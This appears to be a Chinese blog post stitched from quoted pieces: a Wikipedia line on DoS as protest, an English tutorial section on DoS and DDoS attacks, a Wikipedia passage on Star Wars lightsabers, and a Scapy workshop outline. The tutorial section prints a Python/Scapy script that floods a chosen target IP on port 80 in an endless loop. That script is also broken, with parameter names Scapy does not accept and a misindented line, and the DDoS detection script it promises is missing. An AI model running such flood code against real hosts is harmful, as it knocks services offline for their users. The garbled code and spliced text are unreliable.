DoS也常見於部分網路遊戲，被心懷不滿的玩家或是競爭對手廣泛使用。DoS也常被用於抗議，自由軟體基金會創辦人理察·斯托曼曾表示，DoS是「網路街頭抗議」的一種形式。^[2]

 

當一種『攻擊』成為常態，人們不得不了解它的『機制』，尋求『防禦』方法★

DoS & DDoS attack

In this chapter, we will learn about the DoS and DdoS attack and understand how to detect them.

With the boom in the e-commerce industry, the web server is now prone to attacks and is an easy target for the hackers. Hackers usually attempt two types of attack −

• DoS (Denial-of-Service)
• DDoS (Distribted Denial of Service)

DoS (Denial-of-Service) Attack

The Denial of Service (DoS) attack is an attempt by hackers to make a network resource unavailable. It usually interrupts the host, temporary or indefinitely, which is connected to the Internet. These attacks typically target services hosted on mission critical web servers such as banks, credit card payment gateways.

Symptoms of DoS attack

• Unusually slow network performance.
• Unavailability of a particular web site.
• Inability to access any web site.
• Dramatic increase in the number of spam emails received.
• Long-term denial of access to the web or any Internet services.
• Unavailability of a particular website.

Types of DoS Attack & its Python Implementation

DoS attack can be implemented at the data link, network or application layer. Let us now learn about the different types of DoS attacks &; their implementation in Python −

Single IP single port

A large number of packets are sent to web server by using single IP and from single port number. It is a low-level attack which is used to check the behavior of the web server. Its implementation in Python can be done with the help of Scapy. The following python script will help implement Single IP single port DoS attack −

from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)
   
   print ("packet sent ", i)
      i = i + 1

……

DDoS (Distributed Denial-of-Service) Attack

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service or a website unavailable by overloading it with huge floods of traffic generated from multiple sources.

Unlike a Denial of Service (DoS) attack, in which one computer and one Internet connection is used to flood a targeted resource with packets, a DDoS attack uses many computers and many Internet connections, often distributed globally in what is referred to as a botnet. A large-scale volumetric DDoS attack can generate a traffic measured in tens of Gigabits (and even hundreds of Gigabits) per second. It can be read in detail athttps://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm.

Detection of DDoS using Python

Actually DDoS attack is a bit difficult to detect because you do not know the host that is sending the traffic is a fake one or real. The Python script given below will help detect the DDoS attack.

───

 

《駭客大全》上說︰

『攻防』力度強弱，實由『心智』能量驅使，一如操持

光劍

光劍^[1]（英語：lightsaber）在《星際大戰》的世界觀中是一種占有舉足輕重地位的武器，在有關星戰的電影、小說或是遊戲中都經常可以見到。在星戰的世界觀中，光劍的概念即是傳統的金屬劍身被某種以純粹能量形式存在的物質所代替，而這種能量可以被凝聚成長度一米左右的劍刃形狀，並發出特定顏色的光芒。關於這種能量到底是什麼，或許是由於有些媒體的錯誤宣傳，有時人們會誤將這種構成劍身的物質簡單理解為雷射或其他光束，從而引起一些光劍是否違反物理定律之類的疑問^[2]，但事實是星戰中任何地方都找不到支持劍身由光構成這一說法的證據，^[3]儘管能量這一說法非常含糊。有說法解釋這種能量為一團電漿體，受到很強的磁場（或者其他種類的場）作用被束縛成劍的形狀。光劍的劍身是由其後的金屬劍柄發射出的，劍柄一般來說約長二十至三十厘米，可以根據使用者的個人需要被設計成特定的樣式。光劍開關開啟和關閉時，以及光劍揮動時都會發出特別的聲音。

歐比王·肯諾比（星際大戰四部曲：曙光乍現）

 

，至今仍是一門『藝術』也☺

The Art of Packet Crafting with Scapy

Workshop overview

• This is an intense workshop on crafting packets using Python and Scapy.
• We’ll understand low level networking details/abstractions like raw Sockets and move towards using high level tools like Scapy to craft packets.
• We’ll understand Scapy framework and craft packets using it.
• We’ll leverage Scapy as a framework to build custom network tools/utilities.

Concepts covered

• Practical network reconnaissance techniques like host discovery, service discovery, Remote OS finger printing, promiscuous node detection using Scapy.
• Launching Layer 2 attacks.
• Leverage Scapy to build custom tools/utilities such as sniffers, pcap analyzer, wireless sniffers and scanners.

Skill prerequisites

• Basics of Python programming. (strings, lists, functions, list comprehensions etc)
• Knowledge of basic networking concepts. (Enough to know what an IP address, port number, OSI model etc.)
• Comfortable with basic operations on your host operating system.(copying files, using text editor)